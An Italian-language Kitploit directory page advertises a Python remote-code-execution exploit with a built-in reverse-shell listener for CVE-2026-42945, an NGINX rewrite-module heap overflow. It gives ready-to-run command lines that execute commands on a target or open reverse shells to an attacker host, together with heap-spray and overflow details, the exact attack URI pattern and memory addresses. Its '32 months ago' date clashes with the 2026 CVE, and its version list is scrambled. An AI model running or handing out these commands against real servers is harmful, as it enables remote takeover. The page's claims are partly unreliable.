Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-42945-Reverse-Shell-POC — PoC RCE in Python con listener reverse-shell per CVE-2026-42945 (NGINX Rift) | Kitploit
Strumenti/GitHubGitHub/sec-sys/cve-2026-42945-reverse-shell-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingRed TeamingStrumento di Accesso RemotoBinary Exploitation
GitHubsec-sys/cve-2026-42945-reverse-shell-poc

CVE-2026-42945-Reverse-Shell-POC

PoC RCE in Python con listener reverse-shell per CVE-2026-42945 (NGINX Rift)

Vedi Repository
32 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-42945 (NGINX Rift) PoC di RCE con Reverse Shell

Proof-of-concept di esecuzione remota di codice per CVE-2026-42945, un overflow del buffer heap nel ngx_http_rewrite_module di NGINX. Questo fork estende il PoC di trigger pubblico con un listener di reverse shell integrato e parametri di sfruttamento configurabili per CTF e ambienti di laboratorio isolati.


Riepilogo della Vulnerabilità

  • CVE ID: CVE-2026-42945
  • Alias: NGINX Rift
  • Componente Interessato: ngx_http_rewrite_module
  • Versioni Interessate: NGINX Open Source 0.6.27 – 1.30.0; NGINX Plus R32 – R36
  • Versioni Corrette: NGINX Open Source 1.30.1 / ; NGINX Plus , ,
1.31.0
R36 P4
R35 P2
R32 P6
  • Causa Principale: Disallineamento del motore script a due passaggi. Il passaggio di calcolo della lunghezza viene eseguito su un sotto-motore nuovo con is_args = 0, mentre il passaggio di copia viene eseguito sul motore principale con is_args = 1, richiamando ngx_escape_uri(..., NGX_ESCAPE_ARGS). I byte escapabili si espandono di 3 byte ciascuno, facendo traboccare un buffer heap sottodimensionato con dati URI controllati dall'attaccante.
  • Prerequisiti per la RCE: Configurazione rewrite/set vulnerabile che utilizza catture PCRE senza nome ($1, $2) più ? nella stringa di sostituzione; ASLR disabilitato o indirizzi di base heap/libc noti; capacità di eseguire heap spray tramite corpi di richieste POST.

  • File

    FileDescrizione
    cve_2026_42945_rce_poc.pyExploit Python con listener di reverse shell integrato e modalità di esecuzione dei comandi.

    Requisiti

    • Python 3.8+
    • Istanza NGINX di destinazione che corrisponde alla versione vulnerabile e al profilo di configurazione.
    • Raggiungibilità di rete verso la porta HTTP del target.
    • Per la reverse shell: l'host dell'attaccante deve essere raggiungibile dal target sulla porta del listener scelta.

    Utilizzo

    Eseguire un singolo comando

    root@kitploit:~
    python3 cve_2026_42945_rce_poc.py \
      --host 10.0.0.5 \
      --port 80 \
      --cmd "id > /tmp/pwned"
    

    Avviare una reverse shell (bash predefinita)

    root@kitploit:~
    python3 cve_2026_42945_rce_poc.py \
      --host 10.0.0.5 \
      --port 80 \
      --shell \
      --listen-ip 10.0.0.1 \
      --listen-port 1337
    

    Payload di reverse shell Python

    root@kitploit:~
    python3 cve_2026_42945_rce_poc.py \
      --host 10.0.0.5 \
      --port 80 \
      --shell \
      --shell-type python \
      --listen-ip 10.0.0.1 \
      --listen-port 1337
    

    Calibrare gli indirizzi per un target specifico

    root@kitploit:~
    python3 cve_2026_42945_rce_poc.py \
      --host 10.0.0.5 \
      --port 80 \
      --shell \
      --listen-ip 10.0.0.1 \
      --listen-port 1337 \
      --heap-base 0x555555659000 \
      --libc-base 0x7ffff77ba000 \
      --system-offset 0x50d70
    

    Come Funziona

    1. Heap Spray: Invia più richieste POST con corpi contenenti una falsa struttura ngx_pool_cleanup_s: system@libc | pointer to command | null. Questi corpi occupano posizioni heap stabili.
    2. Trigger Overflow: Invia una richiesta GET appositamente costruita a un endpoint rewrite vulnerabile. Il modello URI è:
      root@kitploit:~
      /api/<349 x 'A'><969 x '+'><6-byte heap address>
      
      L'overflow corrompe il puntatore cleanup di un ngx_pool_t adiacente.
    3. Esecuzione del Codice: Quando il pool viene distrutto, il puntatore cleanup corrotto invoca system(command), eseguendo il comando controllato dall'attaccante all'interno del processo worker di NGINX.
    4. Reverse Shell: Se viene usato --shell, il comando è un payload di reverse shell e il listener integrato intercetta la connessione in arrivo.

    Avviso di Sicurezza

    Questo strumento è pensato per:

    • Esercitazioni CTF e di laboratorio.
    • Test di penetrazione autorizzati con permesso scritto.
    • Ricerca sulla sicurezza e attività di hardening difensivo.

    Non utilizzare su sistemi di cui non si è proprietari o per i quali non si ha un permesso esplicito di test.


    Licenza

    Utilizzo a proprio rischio. L'autore non è responsabile per usi non autorizzati o illegali.


    Attribuzione

    Ricerca originale sulla vulnerabilità e PoC di depthfirstdisclosures (https://github.com/depthfirstdisclosures/nginx-rift). Questo fork Python con reverse shell è stato creato per l'uso in laboratori red team / CTF.


    Riferimenti

    • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-42945
    • Avvisi di Sicurezza NGINX: https://nginx.org/en/security_advisories.html
    • Knowledge Base F5 / NGINX: https://my.f5.com/manage/s/article/K000161019
    • Repository della ricerca originale: https://github.com/depthfirstdisclosures/nginx-rift
    Scarica lo strumento